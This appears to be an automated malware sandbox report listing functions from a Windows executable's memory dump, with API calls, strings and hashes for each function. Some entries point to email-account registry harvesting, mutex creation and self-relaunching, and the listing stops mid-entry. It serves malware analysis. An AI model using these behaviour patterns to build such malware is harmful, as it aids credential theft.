Opcode Fuzzy Hash: 2bf5a1a01a9f0caeee1094deeb31f631af0a2d7b694dcdc29980c2dad6fdbdeb
Instruction Fuzzy Hash: A451E372A00A04AFDB20DF69C891B7A73F4EF48725F14466EEC05D7252E738DD058B48

Uniqueness

Uniqueness Score: -1.00%

Function 00457E01, Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 177fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00457596: GetConsoleCP.KERNEL32(00000005,~eD,00000000), ref: 004575DE

WriteFile.KERNEL32(?,00000000,?,00445098,00000000,00421A56,~eD,~eD,00000010,00445098,00000000,00000005,00421A56,00421A56,?), ref: 00457F52
GetLastError.KERNEL32(?,0044657E), ref: 00457F5C
__dosmaperr.LIBCMT ref: 00457FA1

Strings

~eD, xrefs: 00457E15, 00457E16
~eD, xrefs: 00457E17, 00457E84, 00457E93, 00457ED3, 00457F0F, 00457F1F, 00457F2F
~eD, xrefs: 00457EDF, 00457F6E

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ConsoleErrorFileLastWrite__dosmaperr
String ID: ~eD$~eD$~eD
API String ID: 251514795-1598461380
Opcode ID: 27ad540d65e50a43cb431455240b37a87264fc6fb909ff777adbe444ef2102e1
Instruction ID: c093bf76889acc17d1fa22036b65b016a06f1330f7e599f4f56079382a32407d
Opcode Fuzzy Hash: 27ad540d65e50a43cb431455240b37a87264fc6fb909ff777adbe444ef2102e1
Instruction Fuzzy Hash: C551D872908209AFEB11DBA4E841BEFB7B9EF05359F140467E900A7253D738DD09C7A9

Uniqueness

Uniqueness Score: -1.00%

Function 00438AD4, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 120registryCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00438AD9
RegOpenKeyExA.KERNEL32(80000002,?,00000000,00020119,?,73B024D0,00000000,00000008), ref: 00438B5B
RegQueryValueExA.KERNEL32(?,?,00000000,?,?,00000040), ref: 00438BA8
RegCloseKey.ADVAPI32(?), ref: 00438BC9

Strings

@, xrefs: 00438B16
$iEGLMJAcQM@, xrefs: 00438B89

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseH_prologOpenQueryValue
String ID: $iEGLMJAcQM@$@
API String ID: 1233982722-1058998065
Opcode ID: 2fb34adc6fa82efdf4ae228336081e6f7dc567d539a145f113598838231768dd
Instruction ID: 367bd93084d2a7a35925e445f485166969b1686228f1c74074b6aa4ed539c815
Opcode Fuzzy Hash: 2fb34adc6fa82efdf4ae228336081e6f7dc567d539a145f113598838231768dd
Instruction Fuzzy Hash: 985178B0D002599ECB21CFA8D980AEEFBF9BF18304F14516EE449B7202DB745A89CB55

Uniqueness

Uniqueness Score: -1.00%

Function 00434E00, Relevance: 10.6, APIs: 7, Instructions: 75stringregistryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(80000001,0043549A,00000000,00020019,0043549A,?,?,00435370,00000001,?,?,?,0043549A), ref: 00434E25
lstrlenW.KERNEL32(0043549A,?,?,00435370,00000001,?,?,?,0043549A), ref: 00434E4B
lstrcpyW.KERNEL32(00000000,0043549A), ref: 00434E68
lstrcatW.KERNEL32(00000000,0047CC6C), ref: 00434E74
lstrcatW.KERNEL32(00000000,?), ref: 00434E82
RegEnumKeyExW.ADVAPI32 ref: 00434EB6
RegCloseKey.ADVAPI32(0043549A,?,?,00435370,00000001,?,?,?,0043549A), ref: 00434EC3

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrcat$CloseEnumOpenlstrcpylstrlen
String ID:
API String ID: 2943937744-0
Opcode ID: 0219d67e338bd40beddbb7ed987e369c0af50fc4acf4526ffcb48d48a81d74d0
Instruction ID: 3f527511bd662a90bea5e564ca16ff505b986783f0fc1497e79a41689b46f2dc
Opcode Fuzzy Hash: 0219d67e338bd40beddbb7ed987e369c0af50fc4acf4526ffcb48d48a81d74d0
Instruction Fuzzy Hash: 1D216375901118BFEB119F91DD49DEF7B7CEF09355F004066F905E1110EBB85E41CAA9

Uniqueness

Uniqueness Score: -1.00%

Function 004135BF, Relevance: 9.1, APIs: 6, Instructions: 53COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004135C4
std::_Lockit::_Lockit.LIBCPMT ref: 004135D2
int.LIBCPMT ref: 004135E9

Part of subcall function 00409703: std::_Lockit::_Lockit.LIBCPMT ref: 00409714
Part of subcall function 00409703: std::_Lockit::~_Lockit.LIBCPMT ref: 0040972E

std::_Facet_Register.LIBCPMT ref: 00413623
std::_Lockit::~_Lockit.LIBCPMT ref: 00413639
Concurrency::cancel_current_task.LIBCPMT ref: 0041364E

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prologRegister
String ID:
API String ID: 2251497708-0
Opcode ID: 4824269c1deeefcb0dbb31ccf039a35977d0b5677e075813ca22ae46e9fe8536
Instruction ID: 3b004bb535eec8c03e116f6006be92b35a808e672c79bec6f86859ac7a2c8eb0
Opcode Fuzzy Hash: 4824269c1deeefcb0dbb31ccf039a35977d0b5677e075813ca22ae46e9fe8536
Instruction Fuzzy Hash: EB110E32D10115ABCB24EFA5C985AAF7764EB84328F10052FE814A7382DB789E00CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0043592B, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 99registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(80000001,0043549A,00000000,00000100,00000100,?,SMTP Email Address,0047C928), ref: 00435973
RegQueryValueExW.KERNEL32(00000100,00000000,00000000,00000000,00000000,?), ref: 00435992
RegQueryValueExW.KERNEL32(00000100,00000000,00000000,00000000,00000000,?), ref: 004359CD
RegCloseKey.ADVAPI32(00000100), ref: 004359EE

Part of subcall function 00445A55: _free.LIBCMT ref: 00445A68

Strings

SMTP Email Address, xrefs: 00435932

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: QueryValue$CloseOpen_free
String ID: SMTP Email Address
API String ID: 3744367872-3214364705
Opcode ID: b2897442432286f6c7a9022d3ac1aee0ff1fca355918e22b49cf5c7a22221acd
Instruction ID: bea77520f8f9eb75bb65e4d96276d8d86ba46bdd8d66cb8aacbcea5d3b3ef5e9
Opcode Fuzzy Hash: b2897442432286f6c7a9022d3ac1aee0ff1fca355918e22b49cf5c7a22221acd
Instruction Fuzzy Hash: 53319FB1A00609FBEF20DF51DC81FAB7769EF48764F105026FD04AA240E339DD018B69

Uniqueness

Uniqueness Score: -1.00%

Function 00439060, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70processCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00439095
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0043911E
CloseHandle.KERNEL32(?), ref: 00439127
CloseHandle.KERNEL32(?), ref: 00439130

Strings

N, xrefs: 004390CC

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseHandle$CreateFileModuleNameProcess
String ID: N
API String ID: 2820832629-1130791706
Opcode ID: 537e7a186abd502eaad7ebf34fdc1c2b917a28003db7b6770d01e220b166d494
Instruction ID: 68ee94fd2c3d38f532c313cd76568c7e192aa3a233b4418db67ca55748b57ded
Opcode Fuzzy Hash: 537e7a186abd502eaad7ebf34fdc1c2b917a28003db7b6770d01e220b166d494
Instruction Fuzzy Hash: 24218771D1024CBFEB019BA8DC85EEEB77CFF58304F005166F609A2021E6B15A89CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0040BB39, Relevance: 7.8, APIs: 5, Instructions: 295memoryCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040BB3E
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 0040BC51
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?), ref: 0040BC58
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?), ref: 0040BE1C
HeapFree.KERNEL32(00000000), ref: 0040BE23

Part of subcall function 0040AF03: __EH_prolog.LIBCMT ref: 0040AF08

Part of subcall function 00412D4F: _Deallocate.LIBCONCRT ref: 00412D64

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Heap$FreeH_prologProcess$Deallocate
String ID:
API String ID: 4229974167-0
Opcode ID: 4791b2dca9fa4f7a96e6c791f4d86fbd2ab3d60a3364a827af421a51dadcd750
Instruction ID: ff5ab6fc8fa2ec8c53a5ec707b9340397546a5a578c2f07b21ef2291de541eaa
Opcode Fuzzy Hash: 4791b2dca9fa4f7a96e6c791f4d86fbd2ab3d60a3364a827af421a51dadcd750
Instruction Fuzzy Hash: DBC14A71C00248DBCF15DFE5D990ADDFBB5AF18304F60806EE815B7291DB786A48CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0042026B, Relevance: 7.6, APIs: 5, Instructions: 73COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,00000000,?), ref: 0042027F
CreateDirectoryA.KERNEL32(00000000,00000000), ref: 0042028D
_strcat.LIBCMT ref: 004202F3
GetFileAttributesA.KERNEL32(00000000,00000000,?), ref: 00420310
CreateDirectoryA.KERNEL32(00000000,00000000), ref: 00420324

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AttributesCreateDirectoryFile$_strcat
String ID:
API String ID: 2481838186-0
Opcode ID: 5386050ffdcb0e579c67ccba1131c0ef88f796de169c57935e7edbd14464b3f9
Instruction ID: 926b765d940c7e4cf03c66ed4fade1eb7be7ee2715b4740a0b314bdbf1d4a8a6
Opcode Fuzzy Hash: 5386050ffdcb0e579c67ccba1131c0ef88f796de169c57935e7edbd14464b3f9
Instruction Fuzzy Hash: B7116A71F0032457CB204668BC8CBDB77AC9F56314F9401E7E59593292DAB84D85467C

Uniqueness

Uniqueness Score: -1.00%

Function 0043EAC9, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63fileCOMMON

Download Yara Rule

APIs

UnmapViewOfFile.KERNEL32(?,00000000,00000001,00488780,00000000,?,00420971), ref: 0043EB19
CloseHandle.KERNEL32(?,00000000,00000001,00488780,00000000,?,00420971), ref: 0043EB30
CloseHandle.KERNEL32(00000000,00000000,00000001,00488780,00000000,?,00420971), ref: 0043EB45

Strings

qB, xrefs: 0043EB47

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseHandle$FileUnmapView
String ID: qB
API String ID: 260491571-3814867072
Opcode ID: 9712e018d1e961cf73ccf0d32716732a4b896ee084bc0a68f4d03d3075c4d1c5
Instruction ID: e977a0ad52390a9479858dad65047066fdb2ac9878eb5a18df951fdaec7b8c6f
Opcode Fuzzy Hash: 9712e018d1e961cf73ccf0d32716732a4b896ee084bc0a68f4d03d3075c4d1c5
Instruction Fuzzy Hash: 27218E709017009FDB22EB2AC885B5BF7E0BF09314F14846FE19A52691D7B8B840CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00409478, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040947D

Part of subcall function 0043F433: FormatMessageA.KERNEL32(00001300,00000000,?,00000000,?,00000000,00000000), ref: 0043F449

LocalFree.KERNEL32(0000000F,unknown error,0000000D), ref: 004094C3
LocalFree.KERNEL32(?), ref: 004094DC

Strings

unknown error, xrefs: 004094A8

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeLocal$FormatH_prologMessage
String ID: unknown error
API String ID: 252809769-3078798498
Opcode ID: 2db4dc4c1e5e5555505e2b08480146aad6ece04c266066ea01a146b90769ed6f
Instruction ID: 143033a275fd9ea4cf15bf30338bea89ac0712dc1e52f0ce6ff51ee7e44748fa
Opcode Fuzzy Hash: 2db4dc4c1e5e5555505e2b08480146aad6ece04c266066ea01a146b90769ed6f
Instruction Fuzzy Hash: F1014471900205AFDB11EFA5C941AAEBBB5FF18304F10843FB449B7252D7789E04CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 004095E7, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004095EC
std::_Lockit::_Lockit.LIBCPMT ref: 004095FC
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00409639

Part of subcall function 0043F8E5: _Yarn.LIBCPMT ref: 0043F904
Part of subcall function 0043F8E5: _Yarn.LIBCPMT ref: 0043F928

Strings

bad locale name, xrefs: 00409652

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Yarnstd::_$H_prologLocinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 2550485109-1405518554
Opcode ID: 5ac6100a9ca4774aba9c13cb6669a1ed42e62de5a9c01041e4096a03338de0e5
Instruction ID: 31eaf81fc067cb3049c194bbb17bc60594ae06bbf35183faff589a425f7e7705
Opcode Fuzzy Hash: 5ac6100a9ca4774aba9c13cb6669a1ed42e62de5a9c01041e4096a03338de0e5
Instruction Fuzzy Hash: 0E015E71905B40DEC325DF6A848154AFBE0BF2C314B50893FE09ED3A01D334A904CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 0043EDE9, Relevance: 6.1, APIs: 4, Instructions: 114fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0043EC21: CopyFileW.KERNEL32(?,?,00000000,?,?,?,0043EF0B,?,0040B6A1,00000000,?,?,?,?,0040B6A1,?), ref: 0043EC31

CreateFileW.KERNEL32(?,00000081,00000000,00000000,00000003,00000000,00000000,?,0040B6A1,00000001,?,?,?,?,0040B6A1,?), ref: 0043EE31
GetLastError.KERNEL32(?,?,0040B6A1,?,?,?,?,?,?,00000000,?), ref: 0043EE3E

Part of subcall function 0043EC56: CloseHandle.KERNEL32(000000FF,?,0043F31E,?,?,?,00000080,?), ref: 0043EC62

CreateFileW.KERNEL32(0040B6A1,00000082,00000000,00000000,00000003,00000000,00000000,?,?,0040B6A1,?,?), ref: 0043EE6F
GetLastError.KERNEL32(?,?,0040B6A1,?,?,?,?,?,?,00000000,?), ref: 0043EE7C

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$CreateErrorLast$CloseCopyHandle
String ID:
API String ID: 1748377786-0
Opcode ID: 0523ac7acdf49ba59a6fa57aa7c90fcb5d701ac867f32195bcedb89e461acc75
Instruction ID: f3148ced24aea4c6fe529a70361ff3d9a58b080bd54d29d9bdfa659a1503fe1e
Opcode Fuzzy Hash: 0523ac7acdf49ba59a6fa57aa7c90fcb5d701ac867f32195bcedb89e461acc75
Instruction Fuzzy Hash: 8331A671A02119BFDB21ABB78C829BF76ACAF0C714F042526F910D62C2D7B8DD019669

Uniqueness

Uniqueness Score: -1.00%

Function 0040B7F6, Relevance: 6.0, APIs: 4, Instructions: 42COMMON

Download Yara Rule

APIs

CreateTransaction.KTMW32(00000000,00000000,00000001,00000000,00000000,000000FF,00000000,00488780,00488780,00000000,?,?,004207F8,00000000,?,00000000), ref: 0040B80A
CreateDirectoryTransactedA.KERNEL32 ref: 0040B823
CommitTransaction.KTMW32(00000000,?,004207F8,00000000,?,00000000,00000000), ref: 0040B82E
RollbackTransaction.KTMW32(00000000,?,004207F8,00000000,?,00000000,00000000), ref: 0040B836

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Transaction$Create$CommitDirectoryRollbackTransacted
String ID:
API String ID: 629542334-0
Opcode ID: 50e14b63ca18d633df6a308b7ec4a38018a85421cc885a30688cbf6e21692c77
Instruction ID: b18be14526ba35e09e9024abd98d8d90bc636f0dd60b729d8671da52b2d2403f
Opcode Fuzzy Hash: 50e14b63ca18d633df6a308b7ec4a38018a85421cc885a30688cbf6e21692c77
Instruction Fuzzy Hash: 53F0B472A00115BFE71027999CCCD677A2CEB457B47144636FA22A22E0F7B09C4186FE

Uniqueness

Uniqueness Score: -1.00%

Function 0040B7A7, Relevance: 6.0, APIs: 4, Instructions: 38COMMON

Download Yara Rule

APIs

CreateTransaction.KTMW32(00000000,00000000,00000001,00000000,00000000,000000FF,00000000,00488780,00000000,00000000,?,004209C9,00000000), ref: 0040B7BA
DeleteFileTransactedA.KERNEL32 ref: 0040B7D1
CommitTransaction.KTMW32(00000000,?,004209C9,00000000), ref: 0040B7DC
RollbackTransaction.KTMW32(00000000,?,004209C9,00000000), ref: 0040B7E4

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Transaction$CommitCreateDeleteFileRollbackTransacted
String ID:
API String ID: 3802493581-0
Opcode ID: 87cd324ad1989c0657320156594595a03bd9424eab885f956801388e9c53cdfe
Instruction ID: 58dbb2a7c24e90d438a2da79032e2a45378735c8f22fe598a552312de627870f
Opcode Fuzzy Hash: 87cd324ad1989c0657320156594595a03bd9424eab885f956801388e9c53cdfe
Instruction Fuzzy Hash: 1BF08272A00111BFE7205B6A9C0DD6B766DDB8A770714063AFC22E72D0E7B49D4186BF

Uniqueness

Uniqueness Score: -1.00%

Function 0042BFF5, Relevance: 6.0, APIs: 4, Instructions: 38COMMON

Download Yara Rule

APIs

CreateTransaction.KTMW32(00000000,00000000,00000001,00000000,00000000,000000FF,00000000), ref: 0042C008
RemoveDirectoryTransactedA.KERNEL32 ref: 0042C01F
CommitTransaction.KTMW32(00000000,?,00000000), ref: 0042C02A
RollbackTransaction.KTMW32(00000000,?,00000000), ref: 0042C032

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Transaction$CommitCreateDirectoryRemoveRollbackTransacted
String ID:
API String ID: 1201024725-0
Opcode ID: 52e9d3ae115f385b2bf6edc5f6143662b3c9fc35e394ef1331fad7615f1dd12f
Instruction ID: 183120d38f6de6230f0cb0750d318de0fef5fbbbb85c50116f72fc63eed6bb1a
Opcode Fuzzy Hash: 52e9d3ae115f385b2bf6edc5f6143662b3c9fc35e394ef1331fad7615f1dd12f
Instruction Fuzzy Hash: 21F0E272B00120FFE7200BA9AC4CD7B766CDB46770B10062AFC22D72D0E6B49D4186BA

Uniqueness

Uniqueness Score: -1.00%

Function 00435BAC, Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00020008,?), ref: 00435BC4
OpenProcessToken.ADVAPI32(00000000), ref: 00435BCB
GetUserProfileDirectoryA.USERENV(?,?,00000200), ref: 00435BDD
CloseHandle.KERNEL32(?,?,00000200), ref: 00435BEA

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Process$CloseCurrentDirectoryHandleOpenProfileTokenUser
String ID:
API String ID: 1246687928-0
Opcode ID: 69e4764cfb4a4ffa93866ed4cffa959fab9716cde869fc8d8eef6bd74acf3750
Instruction ID: ef9c7944da9d0fbe57d85c82d9cb878354d8ff5e49230341588292012951431b
Opcode Fuzzy Hash: 69e4764cfb4a4ffa93866ed4cffa959fab9716cde869fc8d8eef6bd74acf3750
Instruction Fuzzy Hash: DBF01C71E10208BBEB109BA0DC49EAA7BACEB09244F1000A5E802E1150E6B5EA009A6A

Uniqueness

Uniqueness Score: -1.00%

Function 00457A19, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 80fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,?,?,00000000,00000005,~eD,00000000,?,00457F36,00000010,~eD,00000000,?,00421A56,~eD), ref: 00457AB5
GetLastError.KERNEL32(?,00457F36,00000010,~eD,00000000,?,00421A56,~eD,~eD,00000010,00445098,00000000,00000005,00421A56,00421A56,?), ref: 00457ADB

Strings

~eD, xrefs: 00457A4E

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ErrorFileLastWrite
String ID: ~eD
API String ID: 442123175-3356853795
Opcode ID: d3e58a8c19795838d8790d9ee971bd9e06b8036a9d053c66fc8a29a12884aee6
Instruction ID: bf65c0e4729e722a36b1f943ebc6129d69d6e6920ac8c12f1595faf670b95aa8
Opcode Fuzzy Hash: d3e58a8c19795838d8790d9ee971bd9e06b8036a9d053c66fc8a29a12884aee6
Instruction Fuzzy Hash: F1217E30A042199BDF15CF29DD80AEDB7B9EB49306F2440BAED06D7212D634DE46CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00411CAC, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00411CB1

Part of subcall function 00412B79: __EH_prolog.LIBCMT ref: 00412B7E

Part of subcall function 00413337: __EH_prolog.LIBCMT ref: 0041333C
Part of subcall function 00413337: std::locale::_Init.LIBCPMT ref: 0041335A

Strings

%A, xrefs: 00411D2A
xOA, xrefs: 00411D09

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog$Initstd::locale::_
String ID: xOA$%A
API String ID: 1266419734-3904200367
Opcode ID: cd6a8ab17e015662145e29156e0b4bdbea8a4b5cd25032890fc7092bd14f2c5e
Instruction ID: f1a27dd51c70cf562e9aca30f2b58ce8241449ca7746ca85f8da3430734811d3
Opcode Fuzzy Hash: cd6a8ab17e015662145e29156e0b4bdbea8a4b5cd25032890fc7092bd14f2c5e
Instruction Fuzzy Hash: 081166B1A00616AFD705CF69C981A99FBF4FF48304F10822FA019D3701E7B4AE50CB98

Uniqueness

Uniqueness Score: -1.00%

Function 004360E7, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39synchronizationCOMMON

Download Yara Rule

APIs

OpenMutexA.KERNEL32 ref: 00436130
CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 0043613D

Strings

ENXX, xrefs: 004360F7

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Mutex$CreateOpen
String ID: ENXX
API String ID: 4030545807-3763919171
Opcode ID: 15fe73319a016700f1fa3f76bfd36faf01a2ded22a65ec7536cca4f95705d9f2
Instruction ID: d7b7153b0c48b5d91a1f0c999520678bb0e8285682fdc18e12bdb9ee44f3034a
Opcode Fuzzy Hash: 15fe73319a016700f1fa3f76bfd36faf01a2ded22a65ec7536cca4f95705d9f2
Instruction Fuzzy Hash: D0F04610D083897ACF029BF90C458FFBFFC9D1E284F40A06EE84163203F5A4454583BA

Uniqueness

Uniqueness Score: -1.00%

Function 00452622, Relevance: 4.6, APIs: 3, Instructions: 142COMMON

Download Yara Rule

APIs

Part of subcall function 004571CB: GetLastError.KERNEL32(?,?,?,00444B46,?,00438E89,00000000,?,0045136D,?,00000000,TokenIntegrityLevel,?,00438E89,S-1-5-18,00000000), ref: 004571D0
Part of subcall function 004571CB: SetLastError.KERNEL32(00000000,00000008,000000FF,?,0045136D,?,00000000,TokenIntegrityLevel,?,00438E89,S-1-5-18,00000000), ref: 0045726E

_free.LIBCMT ref: 004526D1
_free.LIBCMT ref: 004526FF
_free.LIBCMT ref: 00452747

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _free$ErrorLast
String ID:
API String ID: 3291180501-0
Opcode ID: 33038ad2825a5da712a9739bb7212fbf91e50b97dac31526c893e92b62ca273b
Instruction ID: 6281fea4de83cea335c9020f67f2b636437e58e66c07028cc3950e3dc999de6a
Opcode Fuzzy Hash: 33038ad2825a5da712a9739bb7212fbf91e50b97dac31526c893e92b62ca273b
Instruction Fuzzy Hash: AB41AE31604106AFD724CFACC985E6AB3E9EF4A315B24056FE805C7392DBB5EC189B84

Uniqueness

Uniqueness Score: -1.00%

Function 00452786, Relevance: 4.6, APIs: 3, Instructions: 96COMMON

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 004527B2
__cftoe.LIBCMT ref: 004527E4
_free.LIBCMT ref: 0045280A

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __cftoe$_free
String ID:
API String ID: 1303422935-0
Opcode ID: 3163681ad91e2cee2f9a6eaa66baaaf421e4da79f53822ff8cad87903d6e01b1
Instruction ID: 25490165fc6857c69720e5b45d4ed59ef477bd3d057dab6fdd1ea5666d3a0f43
Opcode Fuzzy Hash: 3163681ad91e2cee2f9a6eaa66baaaf421e4da79f53822ff8cad87903d6e01b1
Instruction Fuzzy Hash: 35210B728041087ACF24AB95CC45EDF3BB8DF46725F20422BFC25E1182EF74CA488669

Uniqueness

Uniqueness Score: -1.00%

Function 004349A2, Relevance: 4.6, APIs: 3, Instructions: 73libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,?,?,00000000,?,?,?,00435361,00000001,?,?,?,0043549A), ref: 004349E3
GetProcAddress.KERNEL32(00000000,?), ref: 00434A20
FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,00435361,00000001,?,?,?,0043549A), ref: 00434A54

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Library$AddressFreeLoadProc
String ID:
API String ID: 145871493-0
Opcode ID: 2337a6c10410b4f4f6a790c5cc088a69878ab76c52ec47e284b886de45f41515
Instruction ID: f49f4c1cb75c5fbd49bede2b2b2e0205ee8556af43aa466e30f1fd9c6e14c3ef
Opcode Fuzzy Hash: 2337a6c10410b4f4f6a790c5cc088a69878ab76c52ec47e284b886de45f41515
Instruction Fuzzy Hash: 38213874E04248DF9B05DFA898508FFFBB9EE9A304F0451AED841B3201EB749E05CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0040A9DC, Relevance: 4.6, APIs: 3, Instructions: 71COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040A9E1
___std_fs_directory_iterator_open@12.LIBCPMT ref: 0040AA4C
___std_fs_directory_iterator_advance@8.LIBCPMT ref: 0040AA60

Part of subcall function 0043EFBC: FindNextFileW.KERNEL32(?,?,?,0040AA65,?,?,?,?,?,?,?,?,00000000), ref: 0043EFC5

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileFindH_prologNext___std_fs_directory_iterator_advance@8___std_fs_directory_iterator_open@12
String ID:
API String ID: 3696715561-0
Opcode ID: f4157fbba5393df25be266b8d86e8ad444bdf97aae6fe7055065db7a5b06c5af
Instruction ID: 0113cde70424d24ccef5238eb5fdd89d76e8d8ac18f929500eaf95b908a89b9e
Opcode Fuzzy Hash: f4157fbba5393df25be266b8d86e8ad444bdf97aae6fe7055065db7a5b06c5af
Instruction Fuzzy Hash: 0421D231710705EBCF20EAA5DA81BDE73A5AF08314F10442BF802A61D1D7789E51CBAB

Uniqueness

Uniqueness Score: -1.00%

Function 0041EF49, Relevance: 4.6, APIs: 3, Instructions: 59fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000244,?,?,0041FD07,00000140,?,?,00000000), ref: 0041EF66
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,00000140,00000000,?,0041FD07,00000140,?,?,00000000,?,004205B0), ref: 0041EF87
SetFilePointer.KERNEL32(?,00000000,00000000,00000001,?,0041FD07,00000140,?,?,00000000,?,004205B0,?,?,00000244,00488780), ref: 0041EFC1

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$Pointer$Create
String ID:
API String ID: 250661774-0
Opcode ID: 9bb9fcf026c393e84acaf82252b53d31753f1648a71a9be899f94c0f359409e5
Instruction ID: 590f5f10effc152a812acbf342452f322146615697fe813b7eabbc86673be59a
Opcode Fuzzy Hash: 9bb9fcf026c393e84acaf82252b53d31753f1648a71a9be899f94c0f359409e5
Instruction Fuzzy Hash: 81118674A44305BEE7108F399C85F96BB98FB05320F104625F925D72C1D3B4A9408764

Uniqueness

Uniqueness Score: -1.00%

Function 0043DBE2, Relevance: 4.6, APIs: 3, Instructions: 53fileCOMMON

Download Yara Rule

APIs

